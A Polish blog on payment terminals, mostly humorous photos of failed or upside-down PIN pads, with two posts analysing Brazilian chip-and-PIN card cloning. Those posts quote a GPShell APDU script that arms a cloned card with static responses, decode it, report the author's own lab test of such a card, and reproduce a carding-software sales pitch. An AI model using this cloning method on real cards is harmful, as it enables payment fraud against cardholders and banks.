Mistrzowie UI

„If you can read this you are driving to close”. Zwłaszcza, że to PIN pad na stacji paliw.

Reklamy

Świat do góry nogami

Było Ingenico, był VeriFone, dołącza do nich Pax. Też mu się ekran obraca.

Upside+down+Screen+S920

Ktoś przebije moją kolekcję „terminalnych kraszanów” ? 😉

 

Przepraszamy, terminale nieczynne…

Orlen niedawno:

no_way_to_pay_Orlen_failure

 

Co mogło bvć tego przyczyną… hmm… czyżby te nowe PIN pady ? 😉

no_way_to_pay_Orlen_P400

 

Raczej nie, wszystkie naraz nie zwykły padać. Może coś na łączu z acquirerem  ?

Swoją drogą – to jedyne mi znane wdrożenie nowych terminali VeriFone w Polsce. Ktoś widział P400 czy innego Engage’a gdzieś poza Orlenem ?

Winter is coming… Alert irruption !!!

Zima się zbliża, terminale się tamperują. If you know what I mean 😉
OK, to PIN pad, mniejsza z tym. Podobno w tym roku zima ma być ostra, wilgotność powietrza spadnie, będzie się działo…

Ingenico_Airo_trampoliny-tamper


Wydawałoby się, że sprzęt przeznaczony do urządzeń samoobsługowych (zwłaszcza tych „zewnętrznych”) powinien być solidny, a tu masz ci los, „oczko wypadło temu czytniku”.
Ciekawe czy jak odpadnie „dekiel” z PIN pada to dalej będzie działał.

Ingenico_iUC_odpadlo_InPost


Gdyby ktoś marudził, że tylko Ingenico i Ingenico – cóż, nie moja wina, że się role odwróciły. Tam gdzie bywam prawie nie ma terminali VeriFone. A jak się coś trafi, to UI straszy początkiem stulecia.

Vx680_Polcard_1a

„Klonowanie kart czipowych z PIN-em: brazylijska robota” – aktualizacja.

Pół roku temu pastwiłem się nad Kasperskim, który się „popisał” znajomością procesów i standardów związanych z płatnościami kartami chipowymi…

Zapomniałem się pochwalić moimi spostrzeżeniami – otóż kartę taką (jak ci „spece od klonowania kart” z Brazylii) wkrótce po pojawieniu się tamtego artykułu miałem gotową, trochę czasu spędziłem na poszukiwaniach apletu (karty akurat miałem, NXP J2A081 JCOP 2.4.1 – zgodne z Java Card 2.2.2 / Global Platform 2.1.1). Okazało się, że to czego szukałem to:

hat1[1]

MacGyver.cap

Dowcipnisie 😉

Przykładowy soft, gdzie wykorzystywana jest „czapka MacGyvera” to „Credit_UK”, „X1”, „X1 EMV Writer”, „BR Smart Card Writer” czy „SDA chip writer by JAWS” – tyle na szybko namierzyłem na ReverseIt. Było coś jeszcze, w ogóle na Totalhashu znalazłem próbkę z 2014 roku, ale na ReverseIt było tego więcej  – co ciekawe, „spryciarze” w pierwszych wersjach mieli wszystko pohardkowodowane, całe skrypty dla GPShell’a do „uzbrajania” karty – w niektórych wersjach np. ze zmiennymi typu $track w odpowiednich miejscach. Późniejsze wersje wydają się być troszkę bardziej zaawansowane. Mniejsza z tym.

 

NoWayToPay_MacGyver-cap

„Uzbrojona” karta. Niestety nie tak sprytna jak prawdziwy MacGyver.

 

Taka ciekawostka…

run as administrator always
this is a trial version that work 20 runs enough to test
after that you will have to get a full license (1 PC = 1 license)

1st license is $5000
2nd license is $1500
3rd license is $1500

also there is a temp license with 100 cards for $900 for resellers
demo works only with UK
for rest of the countries buy license and create your personal applet about ARQC
http://www.youtube.com/watch?t=15&v=I1XTn175FFk

many of you already order their soft and i start working
remember any country has specific soft so i have a lot of work to do
please do not waste my time and yours with useless questions
How use it :

– Copy your License ID
– Open SDA chip

– Put your number credit card
– Clone done
contact : p****.f**@gmail.com
Angielska jenzyk trudna.

Jak działa to „cudo” – tak jak pisałem pół roku temu, „odpowiadaczka” statycznymi danymi na konkretne rozkazy. Przy czym niezależnie od karty – poza paroma danymi wyciągniętymi z oryginalnej karty takimi jak PAN, Track 2, Cardholder Name – reszta jest taka sama. ATC jest stałe, AC oczywiście też 🙂

Co się dzieje gdy użyjemy takiej karty na terminalu ?
ODA nie przechodzi, terminal żąda ARQC (to nawet nie kwestia terminala, tak wychodzi z IAC Online… geniusze), karta w GenAC1 odpowie ARQC – czyli nie jest to znany sprzed lat (w erze SDA) – a wykorzystywany w UK – trick, że karta uwala online.
Ach, mała ciekawostka – dla niektórych kart (bodajże MC)  GenAC2 zakończy się błędem. Bo dane załadowane do „czapki MacGyvera” mają błąd. ROTFL.

Zweryfikowane na eService’owym Vx520 (pozyskanym na pewnym portalu) – oczywiście bez próby łączenia się z hostem. Dodatkowo na paru developerskich Paxach skonfigurowanych pod testowy serwer autoryzacyjny – na nich potwierdziłem problem z GenAC2.

Dawno mnie tu nie było…

Uzbierało się trochę „No way to pay®”-ów, tak więc po kolei, a może i losowo.

Nowe (lepsze ?) kasy samoobsługowe. Wincor chyba się tak nie psuł, NCR co i rusz widuję „padaki”. I to chyba nie kwestia PIN pada, bo gotówki też nie przyjmie.

03_Tesco_self_service


Tutaj („Tefalowe” namioty przy Biedronkach) – jakoś zapłacić się da.
W sumie bankomaty blisko (zazwyczaj w/przy sklepie), tak więc chcąc kupić kuchenne ustrojstwo za 2500, jakoś da się to ogarnąć.

04_Biedra_namiot


A tutaj VISA promuje płatności gotówkowe. Było o tym głośno swego czasu.

01_Visa_sucks


Zauważone w pewnym sklepie pewnej niemieckiej sieci. O tym nie było głośno, więc  cynk komu trzeba dałem. Sprawdzę kiedyś czy dalej to wisi…

02_Netto


Tu wprawdzie karty są akceptowane, ale chyba coś jest postawione na głowie 😉
[komu trzeba również dałem znać, problem jest znany – „Ingenico tak ma”; ale przecież
spotkałem się z podobnymi cudami i na VeriFonowych terminalach, tam ekran potrafił się obrócić też i o 90 stopni]

06_Pekao


Na deser – tu akurat wszystko działa, tylko… te PIN pady chyba rozmnażają się przez podział. Takie cuda do tej pory bywały głównie w krajach południowych – każda aplikacja na oddzielnym terminalu. Ale pewnie z upałami te „tradycje” zawitały i do nas…

05_Orlen

„Klonowanie kart czipowych z PIN-em: brazylijska robota”. Powrót do przeszłości…

Kaspersky… dlaczego ???
https://plblog.kaspersky.com/chip-n-pin-cloning/9070/
Ciężko to nawet komentować…

A dla tych, których ciekawią szczegóły – całe szczęście opis techniczny stoi na znacznie wyższym poziomie (choć parę nieścisłości da się znaleźć):
https://securelist.com/goodfellas-the-brazilian-carding-scene-is-after-you/84263/

Przejdźmy do rzeczy:

send_apdu -sc 0 -APDU 00a404000e315041592e5359532e4444463031
send_apdu -sc 0 -APDU 00a401060100
send_apdu -sc 0 -APDU 00a40101
send_apdu -sc 0 -APDU 00a40105
send_apdu -sc 0 -APDU 00a40102414100a4040007a0000000041010336f318407a0000000041010a526500a4d6173746572436172648701015f2d0670746573656e9f1101019f12074372656469746f
send apdu -sc 0 -APDU 00a40102131380a80000000c770a82025800940408010601
send_apdu -sc 0 -APDU 00a401025d5d00b2010c005670545A0899999999999999995F3401005F24032405319F0702FF009F0D05F0502400009F0E0500008000009F0F05F0702498008E1200000000000000004201410342035E031F035F25032405185F280200769F4A0182
send_apdu -sc 0 -APDU 00a40102323200b2020c002a70288c1e9f02069f03069f1a0295055f2a029a039c019f37049f35019f45029f34038d06910a0d8a029505
send_apdu -sc 0 -APDU 00a401021c1c00b2030c001570139f080200025f300202019f420209869f440102
send_apdu -sc 0 -APDU 00a40102606000b2040c0059705757139999999999999999D24052010000987655100F5F2013544845534153203230313820202020202020209F1F1F303030303938373635353130303039383730303030303030303030303030309F200700009876551000

Początek pomińmy. Piąta komenda – zaczynamy wysyłać konfigurację do apletu na karcie. Robione jest to komendami… SELECT (to powtarzające się 00a40102).

CLA 00 The command is the last or only command of a chain
No SM or no indication
Logical channel number from 0
INS A4 SELECT
P1 01 Selection by file identifier — Select child DF
P2 02 File control information – Next occurrence
File occurrence – Return FCI template, optional use of FCI tag and length

Payload (Command data field): długość całości, command APDU, długość odpowiedzi, odpowiedź (response APDU, bez SW1/SW2). Tak, coś z tymi długościami jest nie tak, jakby bajt długości w nią wchodził.
Szósta komenda konfiguruje odpowiedź na GPO (TVR Decoder sobie nie radzi ze zdekodowaniem takiego wariantu command APDU dla GPO, gdy PDOL jest pusty – a  przecież w FCI proprietary template nie było 9F38)

Podsumowując: jest to prosta odpowiadaczka statycznymi tekstami na statyczne zapytania. Przynajmniej tyle widać na tym co Kaspersky udostępnił publicznie.

Niestety za mało szczegółów żeby można było powiedzieć kto zawinił. Można co najwyżej zgadywać (na Cashless jest o tym wątek) – a zweryfikować tego się u nas nie da, „niestety”… Jedno jest pewne: PAN jest podpisany, ale już Track 2 Equivalent Data nie.
Aktualizacja poniżej:

Powrót do przeszłości ?

To co odkrył Kaspersky – już w 2015 roku zostało opisane przez Trend Micro. FighterPos, tam też była możliwość „nagrania karty chipowej”. Co ciekawe, trafiłem na StackOverflow na takie oto pytanie z września 2015 roku:

https://stackoverflow.com/questions/32468800/gpshell-emv-card-writing

Na pierwszy rzut oka widać, że to jest ten sam mechanizm co w „Daphne” – APDU uzbrajające kartę mają tą samą konstrukcję – ba, nawet te same błędy 😉

A teraz, żeby było śmieszniej:
1. PAN i Track 2 Equivalent Data się zgadzają.
2. Odpowiedzi na Get Data (9F17), na Verify PIN – ale co ciekawsze, wygląda na to że i na Gen AC (dla ARQC, TC i AAC) są statyczne.
3. Nie jest to „Yes-card”, jaki lata temu pojawił się w Anglii. Na prośbę o ARQC dostajemy  ARQC. TC daje TC.
4. SDA wywala się na Issuer Public Key Recovery. Chyba że w Brazylii MasterCard ma jakiś „unikalny” klucz publiczny CA (indeks 05, długość 1408) ?
Jednym słowem – nic tak na prawdę nie jest zabezpieczone przed modyfikacją…

Cuda…

Ochrona przed sczytaniem karty zbliżeniowej…

– „Złóż dwie karty razam, tego się nie da przeczytać – próbowałem na bramce w metrze”
– „Da się przeczytać, ale potrzeba do tego specjalistycznego sprzętu

A to moja odpowiedź…

7_ISO14443A_cards_in_the_fieldSto złotych z hakiem.

Dwie karty komunikacyjne. Pięć kart płatniczych. Ale rzeczywiście – złożone razem czytały się trzy, czasem cztery.  No i ta moja „zabawka” zasięg ma… góra 5 cm.

Zaległe „No way to pay®”-e…

Nie chodzi tu o kartę (może i jest zbliżeniowa, widać że to jakaś testowa), tylko o to że… no cóż, jakby tu powiedzieć… może by się tak pochwalili urządzeniem, w którym jest ich kernel ?

creditcall_miura_fail.png


Dione robił ponadczasowe urządzenia. Wciąż działają i płatności mobilne akceptują.
A może to jakaś specjalna wersja Android (No Way To) Pay’a ?

Setting-Up-Android-Pay-670x447-FAIL.jpg.png


A tymczasem na Słowacji – wypatrzone na stacji benzynowej. Klęska urodzaju jakaś.
Vx570, Vx520, jakiś iPP a na deser… SC5000 !  THEY LIVE

no_way_to_Slowacja.png